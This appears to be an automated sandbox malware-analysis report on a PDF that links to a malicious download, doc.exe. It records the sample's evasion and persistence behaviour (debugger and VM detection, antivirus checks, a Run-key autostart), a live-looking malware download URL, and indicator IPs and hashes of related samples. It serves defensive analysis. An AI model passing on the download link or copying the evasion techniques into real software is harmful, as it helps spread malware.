Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10DD4B	5_2_3C10DD4B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C11B667	5_2_3C11B667
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C1102C6	5_2_3C1102C6

Clickable URLs found in PDF pointing to bad files

Show sources

Source: aaa.pdf

Initial sample: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: AcroRd32.exe	Binary or memory string: ProgmanH
Source: AcroRd32.exe	Binary or memory string: Shell_TrayWndQ
Source: AcroRd32.exe	Binary or memory string: Progman
Source: AcroRd32.exe	Binary or memory string: Program ManagerK
Source: AcroRd32.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe

System information queried: KernelDebuggerInformation

Enables debug privileges

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process token adjusted: Debug

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: AcroRd32.exe	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\LocL
Source: iexplore.exe	Binary or memory string: Hyper-V RAW

Queries a list of all running processes

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe

Process information queried: ProcessInformation

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Thread delayed: delay time: 922337203685477

Enumerates the file system

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Process information set: NOOPENFILEERRORBOX

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter : SELECT * FROM FirewallProduct

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
21:33:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run flurant C:\Users\user\AppData\Roaming\\williams.exe

Antivirus Detection

Initial Sample

Source	Detection	Cloud	Link
aaa.pdf	8%	virustotal	Browse

Dropped Files

No Antivirus matches

Domains

Source	Detection	Cloud	Link
zwangerschapsyogaamsterdamwest.nl	0%	virustotal	Browse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.185.103.35	http://smarthome.quangcaosangtao.vn/point2/integrate/		malicious	Browse	solarhydro.net/mainauth/vrfy24/
1.1.1.1	47PO# MJB2017062409.exe	821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877	malicious	Browse	newbox2017-001-site1.itempurl.com/config.jpg
	61PO# MJB2017062409.exe	821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877	malicious	Browse	newbox2017-001-site1.itempurl.com/config.jpg
	47PO# MJB2017062409.exe	821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877	malicious	Browse	newbox2017-001-site1.itempurl.com/config.jpg
	61PO# MJB2017062409.exe	821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877	malicious	Browse	newbox2017-001-site1.itempurl.com/config.jpg
213.183.58.7	61INQUIRY.jar	695245f254bd298bb704b3e3ebb1a3f5988949f49b5969c89756f06f7dab098d	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MELBICOM-EU-ASNL	37SHIPMENT DETAILS.jar	bb6d04bf67c9a5875adbbf560b1a3a69b5b34f9f7d691a3453979a9eccfe993b	malicious	Browse	213.183.58.28
	144inv#989898.jar	4ac257d04eacfef1108f8dbf194a7a885964a192a3693186de08c6f4c48e3c11	malicious	Browse	213.183.58.36
	161order.jar	63ef1d7b30fd9bbb08533075a7a0119c2303abf31caee79c7e314f0234d77dcc	malicious	Browse	213.183.58.36
	19ORDER LIST 00235313 PDF.exe	cc73f1cd593458d227626d618ba6da103ed7523ccd885d9b63c185db827a3369	malicious	Browse	213.183.58.59
	new.exe	bdb1678187ff11a1586ac493e32e4fbc288fc1e1f0b9dd680764a9a3e38e98e2	malicious	Browse	213.183.58.27
	11sadween trading RFQ .pdf.jar	35b6d11a6ef04fc4fdbc5db67d42e48b4d0f6983e6f4856e4c91b7ab6ae472a7	malicious	Browse	213.183.58.16
	27IMG_1009212017-001.jpg.jar	2c3576d23cb18220ea1d1d069400a119afd03fb035e560dce9aae4f925271e57	malicious	Browse	213.183.58.4
	83PO1#77322018.exe	badc5ef1e511e8143b08828b707a4f41be7592a9a9486a66dc495547832baec3	malicious	Browse	213.183.58.5
	88BANK SWIFT COPY.jar	7505654ebe7904bb9a2994c5e51cd125a84a1b52e85aed878496c90065e9b6b3	malicious	Browse	213.183.58.8
	25New Order.exe	a0eda639e5288af3c2df8ed5ec40489817819d50d6b8a10a7d584541b44e6f5c	malicious	Browse	213.183.58.34
	177PO-18672.jar	ef44cfb8939a8a4ab36ca78f05ee167da82ab693cf2df783e72fbafe2ba9d0b1	malicious	Browse	213.183.58.17
	80PO.jar	08cf471754214433e80a34f381a60b6eec9f1ade0accaaea9a1146125899f12d	malicious	Browse	213.183.58.28
	44PO112.jar	f708877f46c0cbdf9c855eb7392a1b0a8edc205651ab25b50f740e7e062deb2c	malicious	Browse	213.183.40.31
	11cccc.exe	5a5816c5bd453414112757f274704798f2b9b079cda808316099c3e6837eddc0	malicious	Browse	213.183.40.10
	47ORDER LIST 0018930026.exe	c9494677ea837038c7eb74b00aed8ac15dbb6f4f16bcd095535e39785c1db739	malicious	Browse	213.183.58.59
	SystemAudioClient.exe	12e0148905c871df0e8bfbf998127fbf8899c437ddfede2ba1acf790263a7ed5	malicious	Browse	213.183.58.30
	71FYI.exe	3c9f33c7e16ca9aa611dfe8447b2eb34afd1d37d295c8887edcd7b20f06120e4	malicious	Browse	213.183.58.34
	71FYI.exe	3c9f33c7e16ca9aa611dfe8447b2eb34afd1d37d295c8887edcd7b20f06120e4	malicious	Browse	213.183.58.34
	27Account Ledger Documents.jar	f8602420b353d1e403ddcc92e225b7b08c1c839836729aa8c2a5b42d46e2feb6	malicious	Browse	213.183.58.43
	81Order List.pdf.exe	e5039a02a3a54225075e261df8ab26a9d32adf798305c47cd1bd9d9e19d72276	malicious	Browse	213.183.58.34
CYRUSONE-CyrusOneLLCUS	53Payment Details.jar	04638f518a10edf46aa0bf2773d2035ae33653c74887bf242d9d97b96d68a653	malicious	Browse	192.185.120.165
	Y8rSNN0U1.docx	6ee04f0ff1fcf7b18446945c60a77d5ad953c4102b5099cd0aa24a2cceef10d9	malicious	Browse	192.185.21.159
	59SLIP SABIC IBTC Transfer - MARUTI SUZUKI.exe	85478e4902eaaf36709a819677ccf50f1e2624ac7404331ffab2aab74f60e9ec	malicious	Browse	108.179.213.67
	46Payment - ProLab PO PLSPO-user17001 - Tally upgrade.exe	6b658ec75785c3ee84a698fc984caf69580fac2b0c228119c2b79c769f8336af	malicious	Browse	108.179.213.67
	Invoice #189938677510.doc	67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72a	malicious	Browse	108.179.236.204
	Invoice #189938677510.doc	67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72a	malicious	Browse	108.179.236.204
	Rechnungs-Details # 828256704534.doc	7a713785ef3669c72a5c1cff9368af89bb816483caaaf0e02171f08ae6b256ed	malicious	Browse	162.144.254.125
	Invoice #32257232.doc	9f53ec77d3d8da1ab1eb50b1fcf837bf06d53c52e2912ed1228975ff67649629	malicious	Browse	162.144.254.166
	3ProLab PO PLSPO-user17001 - Tally upgrade.exe	669dca0a8f7e6e3f101a4860077f79e74300206b7c99ef2e26f6ea3696df62a0	malicious	Browse	108.179.213.67
	https://mupahs.edu.bd/DOCX/qoqdoc		malicious	Browse	162.241.241.69
	http://thedreamconnector.com/i/office/365/office/index.html		malicious	Browse	192.185.121.43
	67New Spec. Order.exe	782a3fab9b36bf28b9c4fc1cc35c1117d0befe85532742d881dfc43d49a4b3fc	malicious	Browse	192.185.0.218
	http://sociallence.com/wp-content/uploads/asgarosforum/index_test.php/ahsq/?2hpen8pqg473pbp/		malicious	Browse	192.185.6.144
	68invoice with bank details.exe	a6fa68ed565eb42126949838f1736203ea2eac5457b57acd1acfbcf7ec957c19	malicious	Browse	216.172.164.149
	logonsystem.exe	f719e28bfc39196bee3117b0fbde76f8c88b623747f2d4f349fe0a7043635998	malicious	Browse	162.144.254.166
	http://pbxsky.net/ww		malicious	Browse	192.185.140.236
	Invoice Number 778114.doc	9ce27e2c4198d72d91d53eb790f6be33c91ffefb925dafce4f41a6f64fd9c4d1	malicious	Browse	108.167.181.81
	http://pbxsky.net/ww		malicious	Browse	192.185.140.236
	77VLMDUET.exeDPKAA.exe	9af9b9b374d6a205c026a164c0fbee3b9d91400ec72f1cabb71bfc4ef369fd0e	malicious	Browse	96.125.173.15
	40MAWB-72977085610-1.exe	f97bdc3559767a33e5fd29d159f026bf6976398c1ce9dd61ca4b3b32be9e3459	malicious	Browse	192.185.29.202
unknown	Invoice0186.pdf	0054d08d607b52357cad7412cbfa0ee7125c72e5f1e2851004c57dfeb824e04b	malicious	Browse	192.168.0.40
	P_2038402.xlsx	d9d382644ab9c1a66646b62aacaae39ae5b76827b283a4b3f90372efb8cfb63f	malicious	Browse	192.168.0.44
	bad.pdf	486cf59503248617435fb6c87b4d90f0ed20adae1b4a20d0363a334550bfe36e	malicious	Browse	192.168.0.44
	RFQ.pdf	3cfc4a47958f4a9c8231f479048831c8889d406e55a4d26b801e8918f188fc54	malicious	Browse	192.168.0.44
	100323.pdf	8568262d197f437911ef086468914571c70845ea30095f08fb56a6e1fbc6c281	malicious	Browse	192.168.0.44
	Copy.pdf	64960d4a39836d097af0848fdbdc39330a6d90c2c713322dbcc54254e853d49c	malicious	Browse	127.0.0.1
	2.exe	54dfe1eb4b07dadd51381e3e2159090df194382f203aa776251243bde52a4ef1	malicious	Browse	192.168.0.40
	UPPB502981.doc	bfccc82aee390efca9b3f2efbe7c446b1fe91ffd1d93457f935cba24922c3467	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	2ea9b2e004a04017c332d7cc885f038645142b934adfc2cd93167ad7e835a1f8	malicious	Browse	192.168.0.40
	00ECF4AD.exe	fd8b709edc7c8b152af7dc691de0253d80129fb2a6810c60c4fecbc2f54c9801	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	2f96ef9ddcae737750efdecb3c3ead4dc91041cc9de59c1243cecb11e6196ca6	malicious	Browse	192.168.0.40
	filedata.exe	04e2d81a8b9774d44bdb0b45403262458c2478fe165bce09c1126e88b1b8c4f1	malicious	Browse	192.168.0.40
	.exe	f6b6b407882071c49653281ec726a2b998c9a1876f4f8d597ab99b8f9d1617ff	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	3037d62e51703fe40883ffd722a1d0d6e539495bec4590fcd6fdf2616a262345	malicious	Browse	192.168.1.71

Dropped Files

No context

Screenshot

Startup

System is w10

AcroRd32.exe (PID: 4068 cmdline: 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\aaa.pdf' MD5: C282A6792FB3C2E4CF37082891A5D69C)

